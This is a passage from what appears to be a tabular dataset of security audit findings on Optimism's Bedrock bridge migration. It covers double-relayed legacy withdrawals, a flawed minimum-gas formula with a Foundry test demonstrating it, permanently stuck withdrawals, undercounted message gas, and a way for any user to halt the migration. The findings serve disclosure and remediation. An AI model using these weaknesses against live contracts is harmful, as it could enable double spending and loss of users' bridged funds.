the deployment of the contract. The check will always pass, even if a legacy message have already been relayed using its v0 hash. As a result, random withdrawal messages, as well as messages from malicious actors, can be relayed multiple times during the migration: first, as legacy v0 messages (before the migration); then, as Bedrock v1 messages (during the migration).\\nL2CrossDomainMessenger inherits from CrossDomainMessenger, which inherits from `CrossDomainMessengerLegacySpacer0`, `CrossDomainMessengerLegacySpacer1`, assuming that the contract will be deployed at an address with existing state-the two spacer contracts are needed to ""skip"" the slots occupied by previous implementations of the contract.\\nDuring the migration, legacy (i.e. pre-Bedrock) withdrawal messages will be converted to Bedrock messages-they're expected to call the `relayMessage` function of `L2CrossDomainMessenger`. The `L2CrossDomainMessenger.relayMessage` function checks that the relayed legacy message haven't been relayed already:\\n```\\n// If the message is version 0, then it's a migrated legacy withdrawal. We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n ""CrossDomainMessenger: legacy withdrawal already relayed""\\n );\\n}\\n```\\n\\nIt reads a V0 message hash from the `successfulMessages` state variable, assuming that the content of the variable is preserved during the migration. However, the state and storage of all predeployed contracts is wiped during the migration:\\n```\\n// We need to wipe the storage of every predeployed contract EXCEPT for the GovernanceToken,\\n// WETH9, the DeployerWhitelist, the LegacyMessagePasser, and LegacyERC20ETH. 
We have verified\\n// that none of the legacy storage (other than the aforementioned contracts) is accessible and\\n// therefore can be safely removed from the database. Storage must be wiped before anything\\n// else or the ERC-1967 proxy storage slots will be removed.\\nif err := WipePredeployStorage(db); err != nil {\\n return nil, fmt.Errorf(""cannot wipe storage: %w"", err)\\n}\\n```\\n\\nAlso notice that withdrawals are migrated after predeploys were wiped and deployed-predeploys will have empty storage at the time withdrawals are migrated.\\nMoreover, if we check the code at the `L2CrossDomainMessenger` address of the current version of Optimism, we'll see that the contract's storage layout is different from the layout of the `CrossDomainMessengerLegacySpacer0` and `CrossDomainMessengerLegacySpacer1` contracts: there are no gaps and other spacer slots; `successfulMessages` is the second slot of the contract. Thus, even if there were no wiping, the `successfulMessages` mapping of the new `L2CrossDomainMessenger` contract would still be empty.","Consider cleaning up the storage layout of `L1CrossDomainMessenger`, `L2CrossDomainMessenger` and other proxied contracts.\\nIn the PreCheckWithdrawals function, consider reading withdrawal hashes from the `successfulMessages` mapping of the old `L2CrossDomainMessenger` contract and checking if the values are set. Successful withdrawals should be skipped at this point to filter out legacy withdrawals that have already been relayed.\\nConsider removing the check from the `relayMessage` function, since the check will be useless due to the empty state of the contract.","Withdrawal messages can be relayed twice: once right before and once during the migration. ETH and ERC20 tokens can be withdrawn twice, which is basically double spending of bridged assets.","```\\n// If the message is version 0, then it's a migrated legacy withdrawal. 
We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n ""CrossDomainMessenger: legacy withdrawal already relayed""\\n );\\n}\\n```\\n" +The formula used in ````SafeCall.callWithMinGas()```` is wrong,high,"The formula used in `SafeCall.callWithMinGas()` is not fully complying with EIP-150 and EIP-2929, the actual gas received by the sub-contract can be less than the required `_minGas`. Withdrawal transactions can be finalized with less than specified gas limit, may lead to loss of funds.\\n```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: ""If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the ""Error(string)"" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. 
This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(""SafeCall: Not enough gas"")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n\\nThe current formula used in `SafeCall.callWithMinGas()` involves two issues.\\nFirstly, the `63/64` rule is not the whole story of EIP-150 for the `CALL` opcode, let's take a look at the implementation of EIP-150, a `base` gas is subtracted before applying `63/64` rule.\\n```\\nfunc callGas(isEip150 bool, availableGas, base uint64, callCost *uint256.Int) (uint64, error) {\\n if isEip150 {\\n availableGas = availableGas - base\\n gas := availableGas - availableGas/64\\n // If the bit length exceeds 64 bit we know that the newly calculated ""gas"" for EIP150\\n // is smaller than the requested amount. 
Therefore we return the new gas instead\\n // of returning an error.\\n if !callCost.IsUint64() || gas < callCost.Uint64() {\\n return gas, nil\\n }\\n }\\n if !callCost.IsUint64() {\\n return 0, ErrGasUintOverflow\\n }\\n\\n return callCost.Uint64(), nil\\n}\\n```\\n\\nThe `base` gas is calculated in `gasCall()` of `gas_table.go`, which is subject to\\n```\\n(1) L370~L376: call to a new account\\n(2) L377~L379: call with non zero value\\n(3) L380~L383: memory expansion\\n```\\n\\nThe `(1)` and `(3)` are irrelevant in this case, but `(2)` should be taken into account.\\n```\\nFile: core\\vm\\gas_table.go\\nfunc gasCall(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n var (\\n gas uint64\\n transfersValue = !stack.Back(2).IsZero()\\n address = common.Address(stack.Back(1).Bytes20())\\n )\\n if evm.chainRules.IsEIP158 {\\n if transfersValue && evm.StateDB.Empty(address) {\\n gas += params.CallNewAccountGas\\n }\\n } else if !evm.StateDB.Exist(address) {\\n gas += params.CallNewAccountGas\\n }\\n if transfersValue {\\n gas += params.CallValueTransferGas\\n }\\n memoryGas, err := memoryGasCost(mem, memorySize)\\n if err != nil {\\n return 0, err\\n }\\n var overflow bool\\n if gas, overflow = math.SafeAdd(gas, memoryGas); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n\\n evm.callGasTemp, err = callGas(evm.chainRules.IsEIP150, contract.Gas, gas, stack.Back(0))\\n if err != nil {\\n return 0, err\\n }\\n if gas, overflow = math.SafeAdd(gas, evm.callGasTemp); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n return gas, nil\\n}\\n```\\n\\nThe `raw` extra gas for transferring value is\\n```\\nparams.CallValueTransferGas - params.CallStipend * 64 / 63 = 9000 - 2300 * 64 / 63 = 6664\\n```\\n\\nSecondly, EIP-2929 also affects the gas cost of `CALL` opcode.\\n```\\nFile: core\\vm\\operations_acl.go\\n gasCallEIP2929 = makeCallVariantGasCallEIP2929(gasCall)\\n\\nFile: core\\vm\\operations_acl.go\\nfunc 
makeCallVariantGasCallEIP2929(oldCalculator gasFunc) gasFunc {\\n return func(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n addr := common.Address(stack.Back(1).Bytes20())\\n // Check slot presence in the access list\\n warmAccess := evm.StateDB.AddressInAccessList(addr)\\n // The WarmStorageReadCostEIP2929 (100) is already deducted in the form of a constant cost, so\\n // the cost to charge for cold access, if any, is Cold - Warm\\n coldCost := params.ColdAccountAccessCostEIP2929 - params.WarmStorageReadCostEIP2929\\n if !warmAccess {\\n evm.StateDB.AddAddressToAccessList(addr)\\n // Charge the remaining difference here already, to correctly calculate available\\n // gas for call\\n if !contract.UseGas(coldCost) {\\n return 0, ErrOutOfGas\\n }\\n }\\n // Now call the old calculator, which takes into account\\n // - create new account\\n // - transfer value\\n // - memory expansion\\n // - 63/64ths rule\\n gas, err := oldCalculator(evm, contract, stack, mem, memorySize)\\n if warmAccess || err != nil {\\n return gas, err\\n }\\n // In case of a cold access, we temporarily add the cold charge back, and also\\n // add it to the returned gas. 
By adding it to the return, it will be charged\\n // outside of this function, as part of the dynamic gas, and that will make it\\n // also become correctly reported to tracers.\\n contract.Gas += coldCost\\n return gas + coldCost, nil\\n }\\n}\\n```\\n\\nHere is a test script to show the impact of the two aspects mentioned above\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.15;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""forge-std/console.sol"";\\n\\nlibrary SafeCall {\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n uint256 gasSent;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: ""If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the ""Error(string)"" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. 
As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(\\n 88,\\n 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173\\n )\\n\\n // Revert with 'Error(""SafeCall: Not enough gas"")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n gasSent := gas() // @audit this operation costs 2 gas\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n console.log(""gasSent ="", gasSent);\\n return _success;\\n }\\n}\\n\\ncontract Callee {\\n fallback() external payable {\\n uint256 gas = gasleft();\\n console.log(""gasReceived ="", gas);\\n }\\n}\\n\\ncontract Caller {\\n function execute(\\n address _target,\\n uint256 _minGas,\\n bytes memory _calldata\\n ) external payable {\\n SafeCall.callWithMinGas(_target, _minGas, msg.value, _calldata);\\n }\\n}\\n\\ncontract TestCallWithMinGas is Test {\\n address callee;\\n Caller caller;\\n\\n function setUp() public {\\n callee = address(new Callee());\\n caller = new Caller();\\n }\\n\\n function testCallWithMinGas() public {\\n console.log(""-------1st call------"");\\n caller.execute{gas: 64_855}(callee, 63_000, """");\\n\\n console.log(""\\n -------2nd call------"");\\n caller.execute{gas: 64_855}(callee, 63_000, """");\\n\\n console.log(""\\n -------3rd call------"");\\n caller.execute{gas: 62_555, value: 
1}(callee, 63_000, """");\\n }\\n}\\n```\\n\\nAnd the log would be\\n```\\nRunning 1 test for test/TestCallWithMinGas.sol:TestCallWithMinGas\\n[PASS] testCallWithMinGas() (gas: 36065)\\nLogs:\\n -------1st call------\\n gasReceived = 60582\\n gasSent = 64200\\n\\n -------2nd call------\\n gasReceived = 63042\\n gasSent = 64200\\n\\n -------3rd call------\\n gasReceived = 56483\\n gasSent = 64200\\n```\\n\\nThe difference between `1st call` and `2nd call` is caused by EIP-2929, and the difference between `2nd call` and `3rd call` is caused by transferring value. We can see the actual received gas in the sub-contract is less than the 63,000 `_minGas` limit in both 1st and `3rd call`.",The migration logic may look like\\n```\\nif (_value == 0) {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600\\n} else {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600 + 6700\\n}\\n```\\n,"`SafeCall.callWithMinGas()` is a key design to ensure withdrawal transactions will be executed with more gas than the limit specified by users. This issue breaks the specification. 
Finalizing withdrawal transactions with less than specified gas limit may fail unexpectedly due to out of gas, lead to loss of funds.","```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: ""If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the ""Error(string)"" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(""SafeCall: Not enough gas"")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. 
This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n" +"CrossDomainMessenger does not successfully guarantee replayability, can lose user funds",medium,"While `SafeCall.callWithMinGas` successfully ensures that the called function will not revert, it does not ensure any remaining buffer for continued execution on the calling contract.\\nAs a result, there are situations where `OptimismPortal` can be called with an amount of gas such that the remaining gas after calling `L1CrossDomainMessenger` is sufficient to finalize the transaction, but such that the remaining gas after `L1CrossDomainMessenger` makes its call to target is insufficient to mark the transaction as successful or failed.\\nIn any of these valid scenarios, users who withdraw using the L1CrossDomainMessenger (expecting replayability) will have their withdrawals bricked, permanently losing their funds.\\nWhen a user performs a withdrawal with the `L1CrossDomainMessenger`, they include a `gasLimit` value, which specifies the amount of gas that is needed for the function to execute on L1.\\nThis value is translated into two separate values:\\nThe `OptimismPortal` sends at least baseGas(_message, _minGasLimit) = 64/63 * `_minGasLimit` + 16 * data.length + 200_000 to `L1CrossDomainMessenger`, which accounts for the additional overhead used by the Cross Domain Messenger.\\nThe `L1CrossDomainMessenger` sends at least `_minGasLimit` to the target contract.\\nThe core of 
this vulnerability is in the fact that, if:\\n`OptimismPortal` retains sufficient gas after its call to complete the transaction, and\\n`L1CrossDomainMessenger` runs out of gas after its transaction is complete (even if the tx succeeded)\\n...then the result will be that the transaction is marked as finalized in the Portal (disallowing it from being called again), while the Cross Domain Messenger transaction will revert, causing the target transaction to revert and not setting it in `failedMessages` (disallowing it from being replayed). The result is that the transaction will be permanently stuck.\\nCalculations\\nLet's run through the math to see how this might unfold. We will put aside the additional gas allocated for calldata length, because this amount is used up in the call and doesn't materially impact the calculations.\\nWhen the `OptimismPortal` calls the `L1CrossDomainMessenger`, it is enforced that the gas sent will be greater than or equal to `_minGasLimit * 64/63 + 200_000`.\\nThis ensures that the remaining gas for the `OptimismPortal` to continue execution after the call is at least `_minGasLimit / 64 + 3125`. Even assuming that `_minGasLimit == 0`, this is sufficient for `OptimismPortal` to complete execution, so we can safely say that any time `OptimismPortal.finalizeWithdrawalTransaction()` is called with sufficient gas to pass the `SafeCall.callWithMinGas()` check, it will complete execution.\\nMoving over to `L1CrossDomainMessenger`, our call begins with at least `_minGasLimit * 64/63 + 200_000` gas. By the time we get to the external call, we have remaining gas of at least `_minGasLimit * 64/63 + 158_998`. 
This leaves us with the following guarantees:\\nGas available for the external call will be at least 63/64ths of that, which equals `_minGasLimit + 156_513`.\\nGas available for continued execution after the call will be at least 1/64th of that, which equals `_minGasLimit * 1/63 + 3125`.\\nThe additional gas required to mark the transaction as `failedMessages[versionedHash] = true` and complete the rest of the execution is `23,823`.\\nTherefore, in any situation where the external call uses all the available gas will revert if `_minGasLimit * 1/63 + 3125 < 23_823`, which simplifies to `_minGasLimit < 1_303_974`. In other words, in most cases.\\nHowever, it should be unusual for the external call to use all the available gas. In most cases, it should only use `_minGasLimit`, which would leave `156_513` available to resolve this issue.\\nSo, let's look at some examples of times when this may not be the case.\\nAt Risk Scenarios\\nThere are several valid scenarios where users might encounter this issue, and have their replayable transactions stuck:\\nUser Sends Too Little Gas\\nThe expectation when using the Cross Domain Messenger is that all transactions will be replayable. Even if the `_minGasLimit` is set incorrectly, there will always be the opportunity to correct this by replaying it yourself with a higher gas limit. 
In fact, it is a core tenet of the Cross Domain Messengers that they include replay protection for failed transactions.\\nHowever, if a user sets a gas limit that is too low for a transaction, this issue may result.\\nThe consequence is that, while users think that Cross Domain Messenger transactions are replayable and gas limits don't need to be set precisely, they can in fact lose their entire withdrawal if they set their gas limit too low, even when using the ""safe"" Standard Bridge or Cross Domain Messenger.\\nTarget Contract Uses More Than Minimum Gas\\nThe checks involved in this process ensure that sufficient gas is being sent to a contract, but there is no requirement that that is all the gas a contract uses.\\n`_minGasLimit` should be set sufficiently high for the contract to not revert, but that doesn't mean that `_minGasLimit` represents the total amount of gas the contract uses.\\nAs a silly example, let's look at a modified version of the `gas()` function in your `Burn.sol` contract:\\n```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n\\nThis function runs until it leaves a specified amount of gas, and then returns. 
While the amount of gas sent to this contract could comfortably exceed the `_minGasLimit`, it would not be safe to assume that the amount leftover afterwards would equal `startingGas - _minGasLimit`.\\nWhile this is a contrived example, the point is that there are many situations where it is not safe to assume that the minimum amount of gas a function needs will be greater than the amount it ends up using, if it is provided with extra gas.\\nIn these cases, the assumption that our leftover gas after the function runs will be greater than the required 1/64th does not hold, and the withdrawal can be bricked.",`L1CrossDomainMessenger` should only send `_minGasLimit` along with its call to the target (rather than gas()) to ensure it has sufficient leftover gas to ensure replayability.,"In certain valid scenarios where users decide to use the ""safe"" Cross Domain Messenger or Standard Bridge with the expectation of replayability, their withdrawals from L2 to L1 can be bricked and permanently lost.",```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n +"Gas usage of cross-chain messages is undercounted, causing discrepancy between L1 and L2 and impacting intrinsic gas calculation",medium,"Gas consumption of messages sent via CrossDomainMessenger (including both L1CrossDomainMessenger and L2CrossDomainMessenger) is calculated incorrectly: the gas usage of the ""relayMessage"" wrapper is not counted. As a result, the actual gas consumption of sending a message will be higher than expected. Users will pay less for gas on L1, and L2 blocks may be filled earlier than expected. This will also affect gas metering via ResourceMetering: metered gas will be lower than actual consumed gas, and the EIP-1559-like gas pricing mechanism won't reflect the actual demand for gas.\\nThe CrossDomainMessenger.sendMessage function is used to send cross-chain messages. 
Users are required to set the `_minGasLimit` argument, which is the expected amount of gas that the message will consume on the other chain. The function also computes the amount of gas required to pass the message to the other chain: this is done in the `baseGas` function, which computes the byte-wise cost of the message. `CrossDomainMessenger` also allows users to replay their messages on the destination chain if they failed: to allow this, the contract wraps user messages in `relayMessage` calls. This increases the size of messages, but the `baseGas` call above counts gas usage of only the original, not wrapped in the `relayMessage` call, message.\\nThis contradicts the intrinsic gas calculation in `op-geth`, which calculates gas of an entire message data:\\n```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n\\nThus, there's a discrepancy between the contract and the node, which will result in the node consuming more gas than users paid for.\\nThis behaviour also disagrees with how the migration process works:\\nwhen migrating pre-Bedrock withdrawals, `data` is the entire messages, including the `relayMessage` calldata;\\nthe gas limit of migrated messages is computed on the entire `data`.\\nTaking into account the logic of paying cross-chain messages' gas consumption on L1, I think the implementation in the migration code is correct and the implementation in `CrossDomainMessenger` is wrong: users should pay for sending the entire cross-chain message, not just the calldata that will be execute on the recipient on the other chain.","When counting gas limit in the `CrossDomainMessenger.sendMessage` function, consider counting the entire message, including the `relayMessage` calldata wrapping. 
Consider a change like that:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\nindex f67021010..5239feefd 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n@@ // Remove the line below\\n253,19 // Add the line below\\n253,20 @@ abstract contract CrossDomainMessenger is\\n // message is the amount of gas requested by the user PLUS the base gas value. We want to\\n // guarantee the property that the call to the target contract will always have at least\\n // the minimum gas limit specified by the user.\\n// Add the line below\\n bytes memory wrappedMessage = abi.encodeWithSelector(\\n// Add the line below\\n this.relayMessage.selector,\\n// Add the line below\\n messageNonce(),\\n// Add the line below\\n msg.sender,\\n// Add the line below\\n _target,\\n// Add the line below\\n msg.value,\\n// Add the line below\\n _minGasLimit,\\n// Add the line below\\n _message\\n// Add the line below\\n );\\n _sendMessage(\\n OTHER_MESSENGER,\\n// Remove the line below\\n baseGas(_message, _minGasLimit),\\n// Add the line below\\n baseGas(wrappedMessage, _minGasLimit),\\n msg.value,\\n// Remove the line below\\n abi.encodeWithSelector(\\n// Remove the line below\\n this.relayMessage.selector,\\n// Remove the line below\\n messageNonce(),\\n// Remove the line below\\n msg.sender,\\n// Remove the line below\\n _target,\\n// Remove the line below\\n msg.value,\\n// Remove the line below\\n _minGasLimit,\\n// Remove the line below\\n _message\\n// Remove 
the line below\\n )\\n// Add the line below\\n wrappedMessage\\n );\\n\\n emit SentMessage(_target, msg.sender, _message, messageNonce(), _minGasLimit);\\n```\\n","Since the `CrossDomainMessenger` contract is recommended to be used as the main cross-chain messaging contract and since it's used by both L1 and L2 bridges (when bridging ETH or ERC20 tokens), the undercounted gas will have a broad impact on the system. It'll create a discrepancy in gas usage and payment on L1 and L2: on L1, users will pay for less gas than actually will be consumed by cross-chain messages.\\nAlso, since messages sent from L1 to L2 (via OptimismPortal.depositTransaction) are priced using an EIP-1559-like mechanism (via ResourceMetering._metered), the mechanism will fail to detect the actual demand for gas and will generally set lower gas prices, while actual gas consumption will be higher.\\nThe following bytes are excluded from gas usage counting:\\nthe 4 bytes of the `relayMessage` selector;\\nthe 32 bytes of the message nonce;\\nthe address of the sender (20 bytes);\\nthe address of the recipient (20 bytes);\\nthe amount of ETH sent with the message (32 bytes);\\nthe minimal gas limit of the nested message (32 bytes).\\nThus, every cross-chain message sent via the bridge or the messenger will contain 140 bytes that won't be paid by users. The bytes will however be processed by the node and accounted in the gas consumption.",```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n +Malicious actor can prevent migration by calling a non-existing function in `OVM_L2ToL1MessagePasser` and making `ReadWitnessData` return an error,medium,"There is a mismatch between collected witness data in l2geth to the parsing of the collected data during migration. 
The mismatch will return an error and halt the migration until the data will be cleaned.\\nWitness data is collected from L2geth using a state dumper that collects any call to `OVM_L2ToL1MessagePasser`. The data is collected regardless of the calldata itself. Any call to `OVM_L2ToL1MessagePasser` will be collected. The data will persist regardless of the status of the transaction.\\n```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n\\nThe data will be stored in a file in the following format: ""MSG||""\\nAt the start of the migration process, in order to unpack the message from the calldata, the code uses the first 4 bytes to look up the selector of `passMessageToL1` from the calldata and unpack the calldata according to the ABI.\\n```\\n method, err := abi.MethodById(msgB[:4])\\n if err != nil {\\n return nil, nil, fmt.Errorf(""failed to get method: %w"", err)\\n }\\n\\n out, err := method.Inputs.Unpack(msgB[4:])\\n if err != nil {\\n return nil, nil, fmt.Errorf(""failed to unpack: %w"", err)\\n }\\n```\\n\\nAs can be seen above, the function will return an error that is bubbled up to stop the migration if:\\nThe calldata first 4 bytes is not a selector of a function from the ABI of `OVM_L2ToL1MessagePasser`\\nThe parameters encoded with the selectors are not unpackable (are not the parameters specified by the ABI)\\nA malicious actor will call any non-existing function in the address of `OVM_L2ToL1MessagePasser`. The message will be stored in the witness data and cause an error during migration.\\n`ReadWitnessData` is called to parse the json witness data before any filtering is in place.","Instead of bubbling up an error, simply continue to the next message. 
This shouldn't cause a problem since in the next stages of the migration there are checks to validate any missing messages from the storage.",An arbitrary user can halt the migration process,"```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n" +Causing users lose fund if bridging long message from L2 to L1 due to uncontrolled out-of-gas error,medium,"If the amount of gas provided during finalizing withdrawal transactions passes the check in `callWithMinGas`, it is not guaranteed that the relaying message transaction does not go out of gas. This can happen if the bridged message from L2 to L1 is long enough to increase the gas consumption significantly so that the predicted `baseGas` is not accurate enough.\\nSo far so good.\\nAs a result, while the transaction `OptimismPortal.finalizeWithdrawalTransaction` sets the flag `finalizedWithdrawals[withdrawalHash]` as `true`, the flags `failedMessages[versionedHash]` and `successfulMessages[versionedHash]` are `false`. 
So, the users can not replay their message, and his fund is lost.\\nThe question is that is there any possibility that `L1CrossDomainMessenger` reverts due to OOG, even though the required gas is calculated in L2 in the function `baseGas`?\\nSo, the amount of gas available to `L1CrossDomainMessenger` will be: `(G - K1 - 51)*(63/64)` Please note this number is based on the estimation of gas consumption explained in the comment:\\n// Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call // frame may be passed to a subcontext, we need to ensure that the gas will not be // truncated to hold this function's invariant: ""If a call is performed by // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL` // opcode, so it is factored in with some extra room for error.\\nIn the function `L1CrossDomainMessenger.relayMessage`, some gas will be consumed from line 299 to line 360. For simplicity, I call this amount of gas `K2 + HashingGas`, i.e. the consumed gas is separated for later explanation. In other words, the sum of consumed gas from line 299 to 303 and the consumed gas from line 326 to 360, is called `K2`, and the consumed gas from line 304 to line 325 is called `HashingGas`.\\nSo, the `gasLeft()` in line 361 will be: `(G - K1 - 51)*(63/64) - K2 - HashingGas`\\nTo pass the condition `gasleft() >= ((_minGas + 200) * 64) / 63` in `L1CrossDomainMessenger`, it is necessary to have: `(G - K1 - 51)*(63/64) - K2 - HashingGas >= ((_minGas + 200) * 64) / 63` Please note that, `_minGas` here is equal to `_minGasLimit` which is the amount of gas set by the user to be forwarded to the final receiver on L1. 
